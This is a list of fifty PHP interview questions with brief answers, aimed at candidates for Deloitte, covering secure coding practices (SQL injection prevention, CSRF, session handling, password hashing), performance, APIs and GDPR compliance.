PHP Interview Questions for Deloitte

1. What is the role of PHP in enterprise-level web applications?
PHP powers backend services for large-scale apps, handling API development, database integration, session management, and business logic.

2. How do you ensure data security in a PHP application for financial clients like Deloitte?

  • Use HTTPS for secure data transmission.
  • Sanitize all user inputs to prevent SQL Injection and XSS.
  • Store sensitive data encrypted using OpenSSL or Sodium.

3. How do you prevent SQL Injection in PHP applications?

  • Use PDO with prepared statements.
$stmt = $pdo->prepare("SELECT * FROM users WHERE id = ?");
$stmt->execute([$id]);

4. What is CSRF, and how do you prevent it in PHP?
Cross-Site Request Forgery (CSRF) is prevented by using tokens in forms and validating them on submission.

5. How do you handle API authentication securely?

  • Implement OAuth2 or JWT tokens.
  • Store tokens securely and validate expiration on each request.

6. How do you log critical application errors?
Use Monolog library to handle error logs with appropriate severity levels (INFO, ERROR, CRITICAL).

7. How do you manage user sessions securely in PHP?

  • Use session_start() over HTTPS.
  • Regenerate session IDs after login using session_regenerate_id(true);.
  • Store minimal sensitive data in sessions.

8. How do you handle user roles and permissions?

  • Implement Role-Based Access Control (RBAC).
  • Assign roles and permissions in the database and enforce them through middleware.

9. How do you encrypt and decrypt sensitive data in PHP?

$data = openssl_encrypt($plaintext, 'aes-256-cbc', $key, 0, $iv);

10. How do you validate email addresses?

filter_var($email, FILTER_VALIDATE_EMAIL);

11. How can you improve the performance of a PHP application?

  • Use OPcache.
  • Cache frequent database queries using Redis.
  • Optimize SQL queries and use indexes.

12. How do you implement pagination efficiently in PHP?
Use LIMIT and OFFSET in SQL queries and avoid loading large datasets into memory.

13. What is the difference between require and include in PHP?

  • require: Stops execution if the file is missing.
  • include: Emits a warning but continues execution.

14. How do you handle file uploads securely?

  • Validate file type and size.
  • Store files outside the web root.
  • Rename uploaded files to avoid conflicts.

15. How do you prevent Cross-Site Scripting (XSS) attacks?
Escape output using htmlspecialchars() and validate all user inputs.

16. How do you store environment variables securely?
Use .env files and libraries like vlucas/phpdotenv to manage sensitive configurations.

17. How do you manage API versioning?
Add version numbers to API URLs, e.g., /api/v1/customers.

18. What is the purpose of using Composer in PHP projects?
Composer is a dependency manager for installing and managing external libraries and packages.

19. How do you use Composer to install packages?

composer require monolog/monolog

20. How do you implement audit logs for user actions?
Log every critical user action (login, data changes, deletions) with timestamps and user IDs.

21. How do you handle long-running background jobs in PHP?
Use message queues like RabbitMQ or Redis and process jobs with worker scripts.

22. How do you ensure GDPR compliance for user data?

  • Encrypt personal data.
  • Allow users to request data deletion.
  • Provide data export functionality.

23. How do you implement email verification after user registration?

  • Generate a unique verification token.
  • Send it via email.
  • Validate the token when the user clicks the verification link.

24. How do you handle password resets securely?

  • Generate time-limited reset tokens.
  • Hash tokens before storing them in the database.

25. How do you implement Two-Factor Authentication (2FA) in PHP?
Use libraries like Google Authenticator with TOTP or send OTP codes via email/SMS.

26. How do you restrict API access based on IP addresses?
Implement IP whitelisting and check incoming IPs before allowing access.

27. How do you prevent brute-force attacks on login systems?

  • Implement account lockouts after several failed attempts.
  • Add CAPTCHA for additional verification.

28. How do you optimize database queries in PHP?

  • Use EXPLAIN to analyze query performance.
  • Add appropriate indexes to tables.
  • Avoid N+1 query problems.

29. How do you create a secure logout process?

  • Unset session variables.
  • Destroy the session using session_destroy().
  • Clear session cookies.

30. How do you handle CSV file exports in PHP?

header('Content-Type: text/csv');
header('Content-Disposition: attachment; filename="export.csv"');

31. How do you validate uploaded files as actual images?

if (getimagesize($_FILES['image']['tmp_name'])) {
    // Valid image
}

32. How do you handle multi-language support in PHP applications?
Use translation files and dynamically load strings based on the selected language.

33. How do you secure API endpoints?

  • Authenticate every request using JWT or API keys.
  • Implement proper authorization checks.

34. How do you manage user password storage securely?

  • Use password_hash() to store passwords.
  • Verify passwords using password_verify().

35. How do you handle expired JWT tokens in APIs?
Return a 401 Unauthorized status and prompt the user to re-authenticate or refresh the token.

36. How do you implement caching in PHP applications?

  • Use Redis or Memcached for data caching.
  • Cache API responses and frequently accessed queries.

37. How do you generate and download PDF reports in PHP?
Use libraries like TCPDF or Dompdf to generate PDF files and send them for download.

38. How do you prevent replay attacks in API communications?
Use unique, one-time tokens or timestamps and validate them before processing.

39. How do you implement OTP-based login in PHP?

  • Generate a random OTP.
  • Send it via email or SMS.
  • Validate OTP before allowing access.

40. How do you handle concurrent updates to the same record?
Use optimistic locking with version numbers or database transactions.

41. How do you secure REST APIs for financial applications?

  • Enforce HTTPS.
  • Use OAuth2 or JWT tokens.
  • Validate and sanitize all incoming data.

42. How do you prevent sensitive data exposure in error logs?

  • Avoid logging sensitive information like passwords and tokens.
  • Use log masking and secure log storage.

43. How do you implement server-side data validation in PHP?
Use validation libraries or custom functions to check all user inputs before processing.

44. How do you optimize a PHP script handling millions of records?

  • Process data in batches.
  • Use streaming techniques to avoid memory overload.

45. How do you handle expired sessions gracefully?
Detect expired sessions and redirect users to the login page with a proper message.

46. How do you implement account lockout mechanisms after multiple failed login attempts?
Track login attempts in the database and temporarily lock accounts after a defined threshold.

47. How do you handle asynchronous API calls in PHP?
Use cURL multi-handles or third-party libraries like ReactPHP.

48. How do you calculate password strength in PHP?

  • Check for length, uppercase, lowercase, numbers, and special characters.
  • Provide feedback to users on weak passwords.

49. How do you handle API request throttling?
Track requests per IP using Redis and block or limit requests if the threshold is crossed.

50. How do you build a secure financial reporting system using PHP?

  • Implement strong authentication and authorization controls.
  • Encrypt sensitive data.
  • Use role-based access to control report visibility.